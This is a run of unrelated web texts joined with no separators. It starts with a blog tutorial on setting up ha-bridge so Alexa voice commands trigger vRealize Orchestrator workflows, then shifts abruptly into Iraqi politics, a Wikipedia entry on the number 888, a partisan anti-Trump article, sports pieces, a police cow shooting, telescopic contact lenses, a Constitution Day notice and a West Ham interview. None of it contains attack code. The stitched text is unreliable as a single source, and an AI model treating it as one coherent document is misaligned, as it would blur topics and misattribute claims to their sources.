I'm using ha-bridge to make my REST API calls, rather than writing any custom skills, largely because it's a whole lot easier to do! Once you get ha-bridge up and running you can discover any “device” you've configured by saying “alexa, discover my devices”, and you get the basic actions (on/off) available by default. So for a simple turn on/off action, it's perfect.
Installing ha-bridge
I'm installing ha-bridge on an Ubuntu VM – at this point it's pretty much vanilla installation.
First, some pre-requisites;
sudo apt-get install oracle-java8-jdk -y sudo update-alternatives --config java
Now, lets create a folder and download the Java file:
mkdir /opt/habridge mkdir /opt/habridge/data cd /opt/habridge wget https://github.com/bwssytems/ha-bridge/releases/download/v4.3.1/ha-bridge-4.3.1.jar mv ha-bridge-4.3.1.jar ha-bridge.jar touch /opt/habridge/data/habridge.config
Next create a systemctl unit to start and stop ha-bridge as a service:
sudo vi /etc/systemd/system/habridge.service
Ensure you point the correct location – I am running something on port 80 already, so I'll configure the server to run on 8888.
[Unit] Description=HA Bridge Wants=network.target After=network.target [Service] Type=simple ExecStart=/usr/bin/java -jar -Dconfig.file=/opt/habridge/data/habridge.config -Dserver.port=8888 /opt/habridge/ha-bridge-4.3.1.jar [Install] WantedBy=multi-user.target
Reload systemctl so that it sees the new unit, then enable and start the service:
sudo systemctl daemon-reload sudo systemctl enable habridge.service sudo systemctl start habridge.service sudo systemctl status habridge.service
The ha-bridge web interface should now be available.
Click on Bridge Control and ensure the Device DB Path and File is the full path. Click save. Without this step the device.db isn't saved and you can lose configured devices.
Adding a vRealize Orchestrator workflow
To power on/off the workload cluster, I need to make a POST to the vRealize Orchestrator API with the correct payload. I've written all my workflows to only have a single string input, so both workflows can accept a very similar JSON payload.
For this example, I'll use my powerOnCluster and shutdownVSANCluster workflows. I need to get the workflow ID – the simplist way to do that is to look on the general tab (it can be copied/pasted from there)
Now I can build the REST API URLs required, in the format of:
http://[server]:[port]/vco/api/workflows/[WorkflowId]/executions/
Stop URL: http://vro.definit.local:8281/vco/api/workflows/d834db77-38b7-46f0-b4c2-89ab5e589d13/executions
Start URL: https://vro.definit.local:8281/vco/api/workflows/85cae236-c00a-4173-af24-62c4e9933dc9/executions
The “Authorization” header is a basic authentication header – I used Postman to generate the value for me from a username/password pair. The header is created in JSON format.
Header:
[ { "name":"Authorization", "value":"Basic c2FtQGxxxNotRealxxx6bWRybjFqUTE=" } ]
The payload is a little trickier, but as I only have a single string parameter, it's easy enough to work out – take a look at the vRealize Orchestrator REST API documentation if you need to do something more complex, and test it in Postman before you configure ha-bridge.
Payload:
{ "parameters": [ { "value": { "string": { "value": "Workload" } }, "type": "string", "name": "clusterName", "scope": "local" } ] }
Adding these into the (horrible) form is a little fiddly, so I tend to prepare the values first in my favourite text editor (currently VS Code).
Using the Add/Edit tab, I fill out the name (this is what you will say to Alexa, so think about it – it needs to be easy to say), and description and comments if required.
Next add the action for the “On” and “Off” actions using the values we defined earlier – unfortunately the form on this page is really fiddly.
Target Item -> Workflow execution URL
Http Body -> Payload
Http Header -> Header
Be sure to use a POST verb and set the type to “application/json”
Once this is defined for both the “On” and “Off” items, save and test the workflow.
Adding the new “devices to Alexa
Open the Alexa app, open “Smart Home” and then scan for the new devices using “Discover devices” – you should now see the device appear!
Once the devices are recognised by Alexa, you use all the same phrases that you would with Hue light bulbs.
Alexa, turn on workload cluster Alexa, turn off test vApp
From there, the world is your oyster. Anything you can do in vRealize Orchestrator can be added as a voice command to Alexa. I'm sure someone smarter, and with more time than me, will write some “real” Alexa integrations soon – but for now you can get basic on/off functionality, and provided you make some clever choices with device names, you can get away with a lot!
Alexa, turn on new prod Red Hat server
At which point an Orchestrator workflow deploys a RHEL blueprint (admittedly, with some default settings) in production.
Finally, if you'd like to see it in action, here is a video!
Many Sunnis in particular want to see a constitutional change to limit future prime ministers to two terms. Sunnis also want a guarantee of one of the top security ministries, either defense or police, and the release of prisoners who have been held without charges or even, in many cases, after their acquittals.
Kurds want concessions allowing them to export and sell oil found in Kurdish areas, without central government permission.
So far Mr. Maliki has proved unwilling to make any concessions satisfactory to Sunnis and Kurds.
“There is no way to make any deal with Sunnis and Kurds without getting rid of Maliki,” said one prominent Shiite politician. Mahmoud Othman, a Kurdish politician who did not run for Parliament in the recent elections, was pessimistic about the possibility of a deal to replace Mr. Maliki, and warned that the Parliament might end up stalemated despite the threat from advancing Sunni militants. “That would be a disaster,” he said. “The blocs, they don't care about the country, they care only for themselves.”
The urgency of the discussions was underscored with a report Thursday about the nine young men found dead, in Mahmudiya, south of Baghdad, a community that experienced severe sectarian bloodletting by Shiites and Sunnis in 2006. The men had all had been shot multiple times and dumped under a highway bridge, according to an official in the Ministry of Information, speaking on the condition of anonymity as a matter of government policy. Within hours, the official said, a bomb exploded in the Kadhimiya neighborhood, a Shiite enclave near an important religious shrine, killing 12 people and wounding 35.
In northern Salhuddin Province, the Iraqi Army scored an apparent success against militants of the Islamic State in Iraq and Syria, striking well behind the lines of the militants' advance and recapturing the grounds of Salhuddin University in Tikrit. According to police officials and eyewitnesses in Tikrit, Iraqi warplanes first bombed ISIS positions on the campus, and then army paratroopers were dropped in to take control of it. While ISIS occupies most of Tikrit city, the Iraqi military controls a large air base, Camp Speicher, on the outskirts. Iraqi military officials said “tens” of militants had been killed and their commander wounded, although he escaped.
For the year 888 AD, see 888
Natural number
888 (eight hundred [and] eighty-eight) is the natural number following 887 and preceding 889.
In mathematics [ edit ]
888 is a repdigit (a number all of whose digits are equal),[1] and a strobogrammatic number (one that reads the same upside-down on a seven-segment calculator display).[2] 8883 = 700227072 is the smallest cube in which each digit occurs exactly three times,[3] and the only cube in which three distinct digits each occur three times.[4] 888 the smallest multiple of 24 whose digit sum is 24,[5] and as well as being divisible by its digit sum it is divisible by all of its digits.[6]
888 is a practical number, meaning that every positive integer up to 888 itself may be represented as a sum of distinct divisors of 888.[7]
There are exactly 888 trees with four unlabeled and three labeled nodes,[8] exactly 888 seven-node undirected graphs without isolated vertices,[9] and exactly 888 non-alternating knots whose crossing number is 12.[10]
Symbology and numerology [ edit ]
In Christian numerology, the number 888 represents Jesus, or sometimes more specifically Christ the Redeemer. This representation may be justified either through gematria, by counting the letter values of the Greek transliteration of Jesus' name,[11] or as an opposing value to 666, the number of the beast.[12]
In Chinese numerology, 888 has a different meaning, triple fortune, a strengthening of the meaning of the digit 8.[13] For this reason, addresses and phone numbers containing the digit sequence 888 are considered particularly lucky, and may command a premium because of it.[14]
See also [ edit ]
Feb. 13 — Donald Trump has suffered a series of setbacks in his foreign policy promises while escalating attacks on the workers and oppressed at home.
Trump campaigned against China all throughout his candidacy. He made aggressive charges that China was “raping our country” through currency manipulation and unfair trade. Trump threatened trade retaliation and questioned the One China policy by taking a phone call from the president of Taiwan, which is rightfully part of China.
Reality set in last week. After a phone call with the president of the People's Republic of China, Xi Jinping, who represents 1.3 billion people and the second-largest economy in the world, Trump announced he would follow the One China policy and not recognize Taiwan.
During his campaign, he curried favor with the most right-wing, pro-Israeli forces, like billionaire casino owner Sheldon Adelson, by vowing to move the U.S. Embassy from Tel Aviv to Jerusalem. No other imperialist country has an embassy in Jerusalem.
But when he sought Saudi and Egyptian help in the Middle East, he was told to drop the idea of moving the embassy to Jerusalem. He has not mentioned it since.
Trump vowed to restore torture as official policy and to reopen secret torture sites that the Bush administration had established in other countries but later outlawed. In the face of potential antagonism from the hundreds of millions of people in the Middle East, Trump has had to quietly back away from both these pledges.
Of course, his ban of Muslim immigrants and refugees has blown up in his face. It provoked widespread demonstrations throughout the U.S. and other continents, which are still going on.
Escalating attacks on undocumented
While the capitalist media were focused on the courts and the travel ban, Trump introduced sweeping new rules for deportation. President Barack Obama was rightfully known as “deporter in chief” for the millions of deportations under his regime. In his last years, however, Obama relaxed the rules governing deportations to exclude all but the most serious crimes.
Trump issued an executive order on Jan. 25 changing the rules. His new rules call for deporting anyone with a chargeable offense, whether or not they have been convicted of a crime.
Chargeable offenses include crossing the border without documents, using a false Social Security card (without which no one can work) and any minor misdemeanor. The new rules give local immigration authorities complete discretion in deportation proceedings.
These rules make all 11 million undocumented workers in the U.S. subject to arrest and deportation at any time.
Immigration, Customs and Enforcement immediately carried out 160 arrests in Los Angeles. An additional 200 undocumented workers were arrested in Georgia, North Carolina and South Carolina. About 200 were arrested across Illinois, Indiana, Kansas, Kentucky, Missouri and Wisconsin. (New York Times, Feb. 12)
Breaking up a family
Trump's message was clear in the high-profile deportation of Guadalupe Garcia de Rayos, 35, a mother of two who came to the U.S. in the 1990s when she was 14. Garcia was arrested in an ICE workplace raid in 2008, but the agency worked out an arrangement for her to remain as long as she reported to ICE periodically. She had reported eight times since then.
In 2013 an order to deport was instituted, but Garcia de Rayos was allowed to remain. But when Trump changed the rules to allow priority deportation for any illegality, she was seized on Feb. 8 when she reported to ICE and deported within 24 hours.
Protesters were arrested at demonstrations to stop her deportation.
As to the raids over the last week, Trump has announced he was “carrying out my campaign promise.” In other words, he is stoking fear in the immigrant community and stoking hatred in his reactionary racist followers.
Billionaires on a rampage
One of the reasons political machines under capitalist democracy have been hesitant to put billionaires personally in charge of the White House, as opposed to allowing them into the cabinet and other high positions, is the fear that their greed will lead them to wreck the economy and endanger the system altogether.
But now there is a billionaire boss, who came from outside the political establishment, who has moved directly into the White House, and has complete domination of the most powerful governmental executive position in the world.
The Democratic Party administration of Bill Clinton laid the basis for the great financial crash of 2008. Financial policy was dominated by Robert Rubin, Clinton's secretary of the Treasury and former head of Goldman Sachs, along with Larry Summers and Alan Greenspan, all voices of Wall Street.
This group cast aside regulations that had put a lid on bank speculation. They overturned the Glass-Steagall Act, passed after the Great Depression. The Clinton group fought against regulating a major new speculative instrument called financial derivatives. That unleashed Wall Street and the banks to do as they pleased.
It took less than 10 years for the massive speculation in mortgages and derivatives to build up a bubble. The bubble burst and the Great Recession of 2008 crashed down on the U.S. and the globe. It made the cyclical capitalist boom-and-bust crisis immeasurably worse.
Now the Trump administration is busily crafting new ways of removing all restraints on the banks and financiers.
In the wake of the 2008 crash, the Dodd-Frank Wall Street Reform and Consumer Protection Act was passed to put some restraints on the banks going forward. Trump boasted to a host of bankers that he was going to get advice from Jamie Dimon of JPMorgan Chase on how to take apart Dodd-Frank, among other regulations.
The working class must get ready for a reenactment of speculative frenzy among the bankers and the bosses if Trump pushes through his financial “reform,” which includes his plan to lower corporate taxes and do away with regulations on corporate crimes against the workers and against the environment.
Attacks breed resistance
The right wing mobilized anti-abortion forces nationally on Feb. 11 to demonstrate against Planned Parenthood. Trump has promised to defund the organization, which provides not only abortions but basic women's health care throughout the country.
The right-wing demonstrations were met by equal or greater pro-choice forces supporting Planned Parenthood in cities large and small across the country. For example, in St. Paul, Minn., the anti-abortion forces numbered 500 while the pro-choice forces numbered 5,000. (CommonDreams, Feb. 17)
A massive pushback by tens of thousands in the movement against Trump's Muslim travel ban panicked the ruling class and the courts. Trump suffered a setback as Ninth Circuit Court judges unanimously upheld a Seattle district court ruling that temporarily stopped the travel ban. There is no evidence that Trump has given up the ban, but he has had to say that he might have to redraft it to make it more acceptable in court. But the mass opposition is already in motion.
As demonstrations against the deportations broke out throughout the U.S., a massive demonstration in Mexico City was part of a Mexico-wide mobilization against the wall and the persecution of immigrants. Meanwhile, in the U.S., workers have been demonstrating against anti-union, “right to work” moves in Wisconsin and Michigan state legislatures.
The temporary victory in court against the travel ban and deportations is the result of both the demonstrations down below and the harm that the ban does to the tech industry, the universities, hospitals, agribusiness and other capitalist institutions. It is a case in which the movement on behalf of the oppressed benefited from a combination of their own struggle and a split in the ruling class.
Courts no friend of workers and oppressed
The court ruling on the travel ban has been accompanied by mountains of capitalist praise for judicial checks on the executive, the great “separation of powers,” “checks and balances” and so on.
The Seattle and the Ninth Circuit courts issued liberal rulings. Trump will undoubtedly try again, since the judiciary, and especially the federal judiciary, is the most reactionary branch of the three branches of the capitalist state. Federal judges are appointed for life. They cannot be removed by any ordinary means. Therefore, no one should be inveigled into relying on the courts.
Of course, the workers and oppressed are always in favor of rulings they can take advantage of. For example, the Supreme Court ruling in Brown v. the Board of Education overturned the racist doctrine of “separate but equal,” which had been the legal basis for Jim Crow laws enforcing segregation in the South.
But that 1954 ruling was in anticipation of the coming massive Civil Rights Movement and the general Black Liberation struggle rising in the South. It was an anticipatory ruling.
Similarly, the 1973 Roe v. Wade decision that legalized abortion was a ruling in reaction to a mass movement of women. It had nothing to do with any progressive leaning of the court. In fact, it was a Nixon court with a majority of Republican-appointed judges who were under mass pressure.
By contrast, the history of the Supreme Court is overwhelmingly reactionary. An 1806 Supreme Court ruling that a union organized by shoemakers was a “criminal conspiracy” was applied to other unions for much of the 19th century.
The Dred Scott decision of 1858 declared that runaway fugitive enslaved people were still property of a master and had to be returned. The Plessy v. Ferguson ruling of 1896 upheld the pernicious “separate but equal” doctrine of racial segregation in public facilities.
This reactionary history extends all the way to this century's Citizens United decision, which unleashed billions of dollars to further corrupt the voting system and gut the Voting Rights Act, disenfranchising millions of African American and Latinx people.
As for checks and balances, these are applied by currents of the ruling class to check each other when needed. These checks and balances, now being hailed by the capitalist mass media, have little bearing on the condition of the workers and the oppressed.
There are no checks and balances on the extreme capitalist exploitation and accumulation of wealth in the U.S. that has left the top 0.1 percent of the population with more wealth than the bottom 90 percent.
There are no checks and balances on mass incarceration or racist police killings. There are no checks and balances on the persecution and deportation of immigrants or on the destruction of health care for millions of poor women. There are no checks and balances on imperialist wars of aggression or on the death machines of the military-industrial complex.
As a rule, these atrocities are either ignored or blessed by the courts.
The only true check on the aggression of the ruling class against the workers and the oppressed is the mass struggle.
Former NFL quarterback Michael Vick is coming back to the gridiron in a new professional flag football league that is testing out the concept in a game next month.
The American Flag Football League, which aims to launch eight league-owned franchises in 2018, is hosting a game featuring Vick and former NFL running back Justin Forsett at Avaya Stadium in San Jose, California, on June 27.
The idea is brainchild of financier Jeff Lewis, who thought, while watching his son play flag football last Fall, that there was a business to be had by organizing some of the world's best athletes playing the game.
"I just thought to myself, 'what would this look like if great athletes played this?'" Lewis said. "There's certainly a huge pool to take guys from. Every single year, NFL teams cut 800 guys. We need less than 100 players to field eight teams."
The games will be played 7-on-7 on a full 100-yard football field with 60 minutes of game time.
Michael Vick will participate in a test game for the American Flag Football League, which hopes to launch in 2018 with eight teams. AP Photo/Keith Srakocic
The test next month also will include significant innovation to the sport. The league's flags, which are patent pending, are attached via magnets instead of the typical Velcro. When a flag is detached, a sensor detects it and an official will be able to see the exact point on the field when the flag came off, thus ceding the guesswork to science.
Not only does Lewis see former NFL players, who did well financially, extending their football careers by trying the flag game, but he also sees college stars who didn't make it to the bigger stage showing their talents on his fields.
Perhaps the best storyline would be the guy that absolutely no one ever heard of.
"We'll try to find a 60-year-old guy with a beer gut who can stand in and be a quarterback of one of our teams," Lewis said.
There's still a lot to be worked out, including how much players would be paid. One idea is to have a player of the game bonus be objectively awarded to the player who scored the most points in a pre-determined fantasy point system.
"We think what will make this successful is urgency, affinity and quality," Lewis said. "This is why shows like 'American Idol' and 'American Ninja Warriors' have been popular. We think the game and how we've set it up will give us this."
Vick had ankle surgery last month, but has committed to being a quarterback for one of the teams. He is also an adviser for the league, along with several other former NFL players, including Isaiah Kacyvenski, Rob Konrad and Donovin Darius.
The only fans who can see the game live will be the ones who buy tickets, though the game will be streamed later that day. Perhaps learning from the XFL, Lewis said he prefers having more of a soft launch in front of industry executives so that the kinks can be worked out and that a more polished product can be displayed when it is ready.
Northumbria Police shoot a cow that escaped near to the Coast Road in Wallsend
Northumbria Police shoot a cow that escaped near to the Coast Road in Wallsend
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Police shot dead an escaped cow following a massive operation involving armed officers and a helicopter.
The beast was one of three to escape from a farm in Wallsend yesterday afternoon.
Northumbria Police deployed marksmen, aerial support and, eyewitnesses said, 15 to 20 cars, closing roads in a bid to keep the animals off the busy A1058 Coast Road.
Lisa Barron, 44, was driving along Station Road and preparing to turn on to Chicken Road at around 3.30pm when a cow ran out in front of her car.
“I got a bit of a shock,” the Newcastle University accommodation officer, who lives on nearby Woodbine Avenue, said. “It's not quite what you expect to see.
“Luckily I was slowing down or I would have hit it.”
Witnesses said they believed three cows escaped from the Rising Sun Farm in Wallsend, though two were later recaptured.
However the manager of the farm later told the Chronicle that the farm did not have any cows.
“Three cows escaped from a field north of the Rising Sun Country Park,” he said. “It is believed they were spooked by dog walkers and jumped over a fence.
“Two remain out, but are being kept in a safe place, in a field close to the Park.”
(Image: John Millard)
Up to 20 police cars were reported at a field behind O'Hanlon Crescent where armed police were tracking one brown cow.
Residents approached the animal, which one bystander claimed to be “distressed”, although others said it was not moving. Resident Barry Aitchison, 56, said people were watching police deal with the cow.
He claimed armed officers then asked to enter his house to shoot the beast from an upstairs window but that there was not enough room for them to do so.
Instead, Mr Aitchison claims, they went to his neighbour's property from where the cow was shot and killed at around 5.15pm.
Mr Aitchison said: “It was wrong for the police to kill a cow.”
Police confirmed they had dealt with “loose cows” and had tried to ensure that they did not get on to the busy Coast Road.
A spokesman for Northumbria Police said: “At just before 2.25pm on Sunday May 17 police received a report of cows in the road on Wiltshire Drive, Wallsend heading towards the Coast Road.
“Police attended the scene to locate the cows which had escaped from the nearby Rising Sun Country Park.
“One cow was located on a field near the Coast Road. The Coast Road was closed in both directions to allow attempts to be made to recover the cow.
“However, the cow was in a highly distressed state and considered to be a significant risk to members of the public and motorists.
“The decision was made for the animal to be destroyed by firearms officers at the scene.
“The Coast Road has since reopened and recovery of the other two cows is being made by the owners.”
Are you ready for this? An international team of researchers has developed the world's first telescopic contact lens — a 1.17mm thick pair of contact lenses that, when you want them to, will magnify your vision by 2.8x.
If you feel like this sounds a bit like science fiction (or an April fools' joke), you probably aren't the only one, but this is a legitimate development. Research into this field has existed for some time now, but the results were impractical for one reason or another.
Previous contacts were 4.4mm thick, and another option involved surgery to implant a telescopic lens into your eye, with marginally successful results to boot. This is a contact lens that is thin enough to be worn daily, and the optics are producing better results than anything currently in development.
As you might imagine, the optical details behind creating a zoom lens for your eye can get a little hard to understand (you can read all about those here). The gist is that these lenses use patterned aluminium mirrors to reflect the incoming light rays four times, magnifying the resulting image and correcting for chromatic aberrations in the process. The magnified image is then projected onto the edge of your retina.
Each lens comes with a clear portion in the middle that allows light through unaffected, and a telescopic portion on the outside. In order to allow users to choose between magnified and unmagnified sight, they equipped the lenses with a polarizing filter in front of the clear portion, so that switching between the two is as easy as putting on a pair of polarizing 3D glasses.
As excited as would-be superheros might be about this breakthrough, the motivation behind it is actually medical. People with age-related macular degeneration (or AMD) suffer from degradation of the high-resolution fovea at the center of the retina. These contacts project a magnified image on the lower-resolution perifovea, greatly enhancing these peoples' ability to see details like text.
Because of the type of material the researchers used to create the lens, there's still a ways to go before telescopic vision is ready for the general public. But as soon as they manage to make the lenses out of the type of material today's modern contact lenses are made of, super-human vision may become the next big thing.
(via ExtremeTech via Boingboing)
Canadians making big mark in college basketball
The influence point guard Tyler Ennis has had on Syracuse's 19-0 start suggests he might be the best freshman in the country, surpassing, among others, Kansas forward Andrew Wiggins, the consensus preseason choice as the top freshman.
Ennis and Wiggins have one notable thing in common: They are both Canadian.
So is Anthony Bennett, the No. 1 pick in last year's NBA draft. Wiggins might be the top draft choice this year.
This season, 97 players with Canadian hometowns are on Division I rosters, although many attended American high schools.
Things are different than they were in 1983 when Leo Rautins, who played at Minnesota and Syracuse, became the first Canadian to be taken in the first round of the NBA draft.
And they are different than they were in 1992 when Steve Nash came out of British Columbia as an unknown to play at Santa Clara and later win two NBA MVP awards.
Now a team composed of the best college players from Canada would fare pretty well against a squad of the top college players from the United States. Now there's an idea for a postseason college all-star game.
Freshman guard Tyler Ennis, left, has helped direct Syracuse to a 19-0 record. Forward Andrew Wiggins, right, was more touted before the season. He has led Kansas to a 15-4 record. Freshman guard Tyler Ennis, left, has helped direct Syracuse to a 19-0 record. Forward Andrew Wiggins, right, was more touted before the season. He has led Kansas to a 15-4 record. Photo: Nick Lisi, Associated Press Photo: Nick Lisi, Associated Press Image 1 of / 5 Caption Close Canadians making big mark in college basketball 1 / 5 Back to Gallery
Here are our picks for first- and second-team all-Canada squads of current college players (followed by college, hometown and pertinent stats). We chose units that could be on the floor together. The fact that Kevin Pangos did not make our first-team backcourt says something. The fact that Baylor's Brady Heslip, Dayton's Dyshawn Pierre and St. Bonaventure's Matthew Wright did not make either team says more.
First team
G - Tyler Ennis, Syracuse; Brampton, Ontario; 12 points, 5.4 assists.
G - Olivier Hanlan, Boston College; Alymer, Quebec; 18.9 points
G - Nik Stauskas, Michigan; Mississauga, Ontario; 18.5 points.
F - Andrew Wiggins, Kansas; Thornhill, Ontario; 15.8 points, 6 rebounds.
F - Melvin Ejim, Iowa State; Toronto; 17.9 points, 7.3 rebounds.
Second team
G - Kevin Pangos, Gonzaga; Newmarket, Ontario; 16.3 points, 4.2 assists.
G - Daniel Mullins, New Mexico State; Toronto; 17.0 points.
F - Khem Birch, UNLV; Montreal; 11.3 points, 9.5 rebounds, 3.6 blocks.
F - Dwight Powell, Stanford; Toronto; 14.3 points, 7.8 rebounds.
C - Jordan Bachynski, Arizona State; Calgary, Alberta; 12 points, 9.1 rebounds, 4.4 blocks.
-- Trivia question: Which college has the most former players currently serving as Division I head coaches? (Answer below.)
-- Zero is the number of note this week:
0 - Losses by three teams: Wichita State, Arizona and Syracuse.
0 - Before this season, the times since the turn of the millennium that more than two Division I teams were unbeaten as of Jan. 28.
0 - Division I teams that were unbeaten at this time last season, as well as in 2010, 2009, 2007, 2006, 2003, 2002 and 2000.
0 - Current top-five teams that rank in the top 90 nationally in scoring offense. No. 2 Syracuse and No. 3 Florida rank 184th and 176th, respectively, in scoring.
0 - Current top-five teams that rank outside the top 11 nationally in scoring defense. No. 5 San Diego State ranks tied for first in the fewest points allowed, No. 1 Arizona is fourth and No. 4 Syracuse is sixth. Old-school basketball? You bet. San Diego State head coach Steve Fisher is 68 years old and Syracuse's Jim Boeheim is 69. (Southern Methodist, coached by 73-year-old Larry Brown, is tied with San Diego State for the Division I lead in field-goal-percentage defense.)
0 - Syracuse players who rank among the top 12 in the Atlantic Coast Conference in either scoring or rebounding.
0 - Arizona players who rank among the top 10 Pac-12 players in minutes played.
0 - Times Clemson has beaten North Carolina in their 57 games in Chapel Hill, N.C., dating back to the first meeting in 1926. Only nine of those games were decided by single-digit margins, and the Tar Heels won 26 of them by 20 points or more.
-- Trivia answer: Princeton. Seven former Tigers players are Division I head coaches: Craig Robinson (Oregon State), John Thompson III (Georgetown), Sydney Johnson (Fairfield), Chris Mooney (Richmond), Joe Scott (Denver), Mike Brennan (American), Mitch Henderson (Princeton).
The New York State Archives and Library will celebrate Constitution Day on Saturday, September 17 with a public display of New York State's handwritten 1788 copy of the United States Constitution, from the convention in Poughkeepsie where it was ratified. The Constitution Day exhibition will be held on the 7th floor of the Cultural Education Center at 222 Madison Avenue in Albany on Saturday, September 17 from 9:30 a.m. – 5:00 p.m. In addition, free pocket-sized copies of the Constitution will be distributed on a first come, first-served basis; one per visitor while quantities last. A digital talking book of the Constitution from the New York State Talking Book and Braille Library (TBBL) will be available for TBBL patrons as well.
“The United States Constitution is a founding document of our country and the foundation of our democracy,” said State Education Commissioner MaryEllen Elia. “I encourage the public to take advantage of this rare opportunity to view New York's copy of the Constitution in person on Constitution Day and learn about the vast resources of the State Archives and Library.”
“We're proud to display New York's handwritten copy of the United States Constitution – used by the delegates in Poughkeepsie over 225 years ago to help form our nation's system of government,” said State Archivist Thomas Ruller. “The New York State Archives is honored to hold this national treasure and share it with the people of the great State of New York.”
“As one of the oldest depositories in the country, the State Library is proud to celebrate Constitution Day,” said State Librarian Bernard Margolis. “We encourage the public to not only learn about the history of the Constitution, but to explore the various federal government resources and documents available to the public, free of charge, at the New York State Library.”
The United States Constitution was created on September 17, 1787. The document was considered by New York delegates who met in Poughkeepsie (The Poughkeepsie Convention), and after lengthy debates they voted to ratify the Constitution on July 26, 1788. New York was the eleventh state to ratify.
The text of the Constitution was engrossed (written in a large, legible hand) on parchment (treated sheepskin). The engrossed copy of the U.S. Constitution and the manuscript journal of the Poughkeepsie Convention were in a locked safe when the State Capitol burned in 1911. They were preserved from destruction and today they are among the treasured documents of the New York State Archives. An image of the first page of document is available here: http://digitalcollections.archives.nysed.gov/index.php/Detail/Object/Show/object_id/10481.
The annual celebration of Constitution Day is an opportunity for the over 3,000 official depositories of federal publications, in print and online, to share their rich resources with the public. The New York State Library, one of the oldest depositories in the country, was founded in 1818. It is the largest depository in the state of New York and its holdings include both federal and state documents. As the New York State regional depository for U.S. government publications, the State Library receives and permanently keeps a copy of every document distributed under the Government Printing Office Depository Library Program.
The New York State Archives and Library are programs of the State Education Department's Office of Cultural Education. Located on Madison Avenue in Albany, the Archives and Library are open Monday through Saturday from 9:30 a.m. to 5 p.m. except on legal holidays. Further information can be obtained by calling (518) 474-5355 or visiting the library website at http://www.oce.nysed.gov/.
The league table shows West Ham in an unlikely fifth position and scrapping for a Champions League place.
Co-chairman David Sullivan is studying the form and calculating what it all means.
Here he answers questions set by Head of Sport LEE CLAYTON.
Scroll down for video
West Ham's stunning season has seen them rise to within a point of the Champions League places
West Ham co-chairman David Sullivan, pictured at the Olympic Stadium, answers Sportsmail's questions
Are you feeling the pressure?
No. Pressure is being where Norwich, Sunderland and Newcastle are. And Crystal Palace, they're not safe yet. Alan Pardew is a good manager but they will all be breathing heavily. That's pressure.
Sam Allardyce has come back like a tiger and he could lead Sunderland to salvation. He's recharged after he needed a rest. No, I'm glad to be away from all that.
When you look at the league table, what do you see?
Leicester. The Leicester miracle. And then I see Stoke, going well and queuing up behind us. I want to look up but I also want to defend the position we are in.
Leicester's 'miracle' has been Sullivan's highlight of the season, with the Foxes closing in on the league title
The Hammers chief says he hopes Leicester can win the Premier League, with West Ham winning the FA Cup
Sullivan is the financier and executive producer for Fall of the Krays, which is out on DVD, Blu-Ray and Double Pack next Monday
What are you doing to keep your mind clear?
I am the financier and executive producer for Fall of the Krays — which is out next Monday on DVD, make sure you mention that.
British films are my hobby. I love the locations, the stories, the accents. Michael Caine, Bob Hoskins, Peter Sellers. I fell in love with it then and now it is giving me a light distraction, but only a light one.
But there will be nerves in the Manchester City and Manchester United boardrooms...
United are coming again — they have five home games and three away games remaining. The same as us. They are still in the FA Cup and they are turning a corner. They will fancy finishing fourth.
City? They made a big mistake announcing a change of manager in the middle of the season. It has demotivated their players. Half of them know they will be out when Pep Guardiola comes.
They have the ex-Barcelona people and some of their people look down on us. In the past, they always beat us. They beat us 9-0 in the League Cup the other season, but nobody has all the answers.
The last two matches — a 2-2 draw at Chelsea, following a 1-1 draw in the FA Cup at Manchester United... the form is good.
We're dreaming of what can happen and we're playing great football. At United and Chelsea we deserved to win. We passed the ball in a wizardly fashion.
Do you know we haven't had a penalty away in four years and we have the least number of penalties in the league in those four years? We're due some luck.
Manuel Lanzini skips away from Manchester United's Ander Herrera as West Ham drew at Old Trafford
The West Ham players salute their fans after a performance Sullivan described as 'wizardly' against United
What has manager Slaven Bilic brought to the club?
He was a gamble — I told him that. And now I've told him he is looking less of a gamble! He impresses me, he is passionate and he talks with sense and intelligence.
In my 25 years in football I have listened to some of my managers speak after a game and thought: ‘Who is he kidding? Does he think we are stupid?' But Slaven calls it and I like the way he calls it.
If we've been lucky, Slaven will say that. If we've played badly, he will say that. The fans have got someone who feels the game as they do.
And he fights like mad for his players. When they had fines owed to the club, he came and fought for them and had the fines removed. I'm not sure I liked that... it cost us a few quid! But he fought for them. Fines for indiscipline, that sort of thing.
He has a gravitas, a strength. I am proud of him and respect him. Now can he do it again next season?
Bringing Slaven Bilic to West Ham 'was a gamble' admits Sullivan, but it is one that has paid off this season
Bilic celebrates a Hammers goal, and his 'gravitas' and 'strength' have earned him Sullivan's respect
And what about Dimitri Payet?
We are not a one-man team. You look at Sunderland and those goals from Jermain Defoe — and their survival is in his hands.
You say Payet and, yes, he is our star, but I can say (Manuel) Lanzini, (Michail) Antonio, (Mark) Noble, (Cheikhou) Kouyate. We've just given Kouyate a new deal, even though he had more than four years on his last one.
We want to reward excellence. They have all played their part.
Dimitri Payet has been in stunning form for West Ham this season, but they are not a one-man team
Sullivan says that teams like Sunderland are over-reliant on the likes of Jermain Defoe, unlike his side
How did the Payet deal come about?
Mark McKay, the agent, came to me and I checked his stats. Payet: best assists in France, third best in Europe.
We were talking to the then Marseille manager Marcelo Bielsa about coming to West Ham and we said: ‘Who is the one player you would bring?' He said Payet.
Later I said to Slaven: ‘What do you think of Payet?' And he said: ‘I'd love him — not only will he achieve great things, but he will make the other players better. They will get passes they wouldn't normally get and score goals they wouldn't normally score.'
So the negotiations went on and on, the fee went up and up, the wages went up and up. It started at £6million and wages of £40,000 a week and ended up at... well, that's confidential... but a lot of money. He's worth it.
Payet, pictured in action at Chelsea, was first recommended to West Ham by agent Mark McKay
When Marcelo Bielsa was in talks about managing West Ham he wanted to bring Payet to the club
What has been the best moment of the season?
I hope it is still to come. I want West Ham to get to Wembley and win the FA Cup. That's the priority.
So far? Too many! Beating Spurs at home after they humiliated us at their place. Winning 3-0 at Liverpool, winning 2-1 at Manchester City, coming back from 2-0 down to win 3-2 at Everton, Payet's free-kick at Manchester United.
But all that is tempered by the fact we never turned up at Watford or Newcastle and we didn't turn up until the last 15 minutes at Norwich. Those performances still irk.
Are you allowing yourself to think of reaching the Champions League?
You can't allow yourself to think about that. I'm too busy! Sorting the Manchester United FA Cup replay time. And anyway, if you finish fourth, you don't qualify, you have to pre-qualify.
And we would be unseeded, so it would be a difficult fixture against the third-best team in Spain, or something like that. I had my eye on Arsenal and third, but we needed Everton to get something and they didn't.
The Frenchman's free-kick against Manchester United is one of Sullivan's moments of the season so far
So you have thought about it ...
